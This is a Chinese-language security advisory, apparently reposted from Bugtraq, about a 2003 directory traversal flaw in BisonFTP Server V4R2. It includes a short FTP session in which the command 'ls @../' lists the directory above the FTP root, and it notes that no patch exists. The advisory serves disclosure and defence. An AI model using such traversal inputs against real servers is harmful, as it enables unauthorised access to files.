发布日期：2003-02-17
更新日期：2003-02-26

受影响系统：

BisonFTP Bison Ftp Server V4R2

描述：

---

BUGTRAQ  ID: 6873

BisonFTP是一款可使用在Microsoft Windows 9x/NT操作系统上的FTP服务程序。

BisonFTP对用户提交的特殊字符缺少正确过滤，远程攻击者可以利用这个漏洞以FTP进程权限在系统上查看目录列表。

BisonFTP对'@../'字符请求缺少正确处理，发送包含'@../'字符的'ls'命令，可使FTP服务器返回FTP ROOT父目录的列表信息。

<*来源：Immune Advisory （ja@immune.dk）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104549663525614&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Immune Advisory （ja@immune.dk）提供了如下测试方法：

ftp> ls @../
227 Entering PASV Mode (10,10,10,10,4,126)
150 Directory List Follows
-rwxrwxrwx   1 user     group      739577 Feb 05  2002 BisonFTP42.exe
226 Listing complete.
ftp> mget @../Biso
local: BisonFTP42.exe remote: BisonFTP42.exe
227 Entering PASV Mode (10,10,10,10,4,128)
550 File does not exist
ftp>

建议：

---

厂商补丁：

BisonFTP
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.bisonftp.com

浏览次数：2930
严重程度：0（网友投票）